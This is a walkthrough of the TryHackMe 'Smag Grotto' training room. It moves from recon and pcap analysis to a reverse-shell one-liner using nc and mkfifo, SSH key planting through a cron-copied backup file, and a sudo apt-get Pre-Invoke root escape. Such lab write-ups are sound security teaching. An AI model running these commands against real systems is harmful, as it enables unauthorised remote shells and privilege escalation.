Smag Grotto Room on TryHackMe: Complete Walkthrough and Guide
LINK - https://tryhackme.com/room/smaggrotto
RECON/SCANNING
So First We Will Run Nmap/NmapAutomator to scan the target for open ports.
So as you can see we got two open ports .
WEB ENUMERATION
Now Let’s Check out Port 80 First .
Got a Web Page So I checked it and do some searching but didn’t find anything so i tried Gobuster Tool For Finding Hidden Directory Next.
As a result we found a 301 redirection to /mail directory So let’s check it out :
We found a .pcap file inside the /mail directory and inside the web page we can see it is asking to download it through wget so we will do that
Now let’s analyze the .pcap file in wireshark
PCAP FILE ANALYSIS
On filtering the http logs we can see two entries which could give us some information.
On Following any one log through HTTP stream :
Now in that we saw some juicy information :
As you can see we got HOST name with subdomain in which there is some login.php whose credentials are also given to us
GETTING REVERSE SHELL
Now quickly let’s add the host and subdomain in our /etc/hosts
Now let’s see what is there in subdomain that we got from the .pcap file
Nice there is the admin.php and login.php so lets login using the credentials we got .
As you can see we successfully entered into admin.php
Now its asking us to enter a command . On inspecting I saw that it is a type of website which executes command and don’t show outputs So we might get a reverse shell from here.
So Let’s setup netcat listener first
Now Let’s Inject this reverse shell payload:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc "your-ip" 4444 >/tmp/f
On Executing this code into the webpage we can see we got a reverse shell on our listener:
Now First Stabilize this shell using the below link:
SHELL STABILIZING
LOCAL ENUMERATION
After stabilizing the shell we can see that we cant access user.txt as it belongs to the user jake and we don’t have any permission on it
So Now Lets check out other services to get jake user access
You can run LinPeas but for me i just instinctively went to /etc/crontab
We can see there is a file named as jake_id_rsa.pub.backup whose contents are replacing /home/jake/.ssh/authorized_keys contents time to time .
USER FLAG
Since we have write permission on the file we cant edit its content and change it with our public key so lets generate a key for this in our host machine using the below command.
ssh-keygen -t rsa -P '' -f jakekey
Now lets add this jakekey.pub content to the jake_id_rsa.pub.backup file
You can do this either with nano or echo commands
Now after giving appropriate permission to the key lets ssh into jake user
There we go!!!
We successfully get a login on jake user now lets get user.txt from /home/jake/user.txt
ROOT FLAG
Now let’s do sudo -l to see whether we have sudo permission on any file/service or not
We can see there is a service named as apt-get
Let’s search this on GTFO Bins maybe we can find a way to escalate it to root user.
There we go we got a way to escalate jake to root user by executing the below command:
sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
VOILA!!!!
We got Root user Now lets get the root.txt flag
WE FINALLY DID IT !!!! CHALLENGE SOLVED !!
For Any Query Or Problem Either Leave A Comment Or Contact At reapsec.com
THANK YOU FOR READING!!
